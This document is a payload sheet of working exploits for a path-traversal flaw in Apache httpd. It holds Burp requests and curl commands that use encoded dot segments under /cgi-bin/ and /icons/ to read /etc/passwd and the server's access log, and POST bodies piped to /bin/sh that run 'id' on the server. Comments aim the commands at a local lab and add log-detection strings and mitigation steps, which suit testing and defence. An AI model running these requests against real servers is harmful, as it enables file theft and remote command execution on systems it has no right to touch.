BURP SUITE REPEATER
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: please-update-to-apache-2.4.50-for-fix.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: please-update-to-apache-2.4.50-for-fix.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
CURL
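# Path-traversal probes against a local lab instance (localhost:8080).
#
# --path-as-is stops curl from collapsing dot segments in the URL path, so
# the server receives the encoded segments exactly as written here.
# The URLs are quoted: the angle brackets that wrapped them on the original
# page were autolink markup, which a shell would parse as redirections.
#
# Reading the result: a body containing passwd entries means the request
# left the mapped directory. An error status means it was rejected; the
# exact code depends on the httpd build and config, so confirm on yours.
#
# Detection: access logs normally record the request line as received, so
# "/.%2e/" or "/%2e%2e/" right after a mapped prefix such as /icons/ or
# /cgi-bin/ is a usable search string (check your LogFormat first).
#
# Mitigation: upgrade httpd. The Burp requests on this page name 2.4.50 in
# their Host header; check the vendor advisory for the current fixed
# release. Keeping "Require all denied" on <Directory /> also prevents
# files outside the document roots from being served this way.

# /icons/ prefix, ".%2e" form (only the second dot is encoded).
curl -s --path-as-is 'http://localhost:8080/icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# /icons/ prefix, "%2e%2e" form (both dots encoded).
curl -s --path-as-is 'http://localhost:8080/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

# /cgi-bin/ prefix, ".%2e" form.
curl -s --path-as-is 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# /cgi-bin/ prefix, "%2e%2e" form.
curl -s --path-as-is 'http://localhost:8080/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'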
LOGS
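# Same traversal, aimed at the server's own access log. The log path is
# installation-specific; this is the one given on the page. An exposed
# access log can disclose client addresses and requested URLs, including
# any tokens carried in query strings.
curl -s --path-as-is 'http://localhost:8080/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/usr/local/apache/logs/access_log'

# Command-execution check through the CGI-mapped prefix: the POST body is
# handed to /bin/sh as its input. This only applies when a CGI module
# (mod_cgi / mod_cgid) is loaded; without one the exposure is limited to
# file disclosure. The two commands were fused onto one line on the
# original page and are separated here, with the autolink brackets removed.
#
# Detection: POST requests whose logged path sits under /cgi-bin/ and ends
# in /bin/sh, and an httpd worker spawning a shell as a child process.
# Mitigation: upgrade httpd, unload the CGI modules where they are not
# needed, and keep "Require all denied" on <Directory />.

# Sent without --path-as-is, as on the original page.
curl --data "echo;id" 'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# The body prints a Content-Type header and a blank line before the
# command output, i.e. the header block a CGI response is expected to start with.
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"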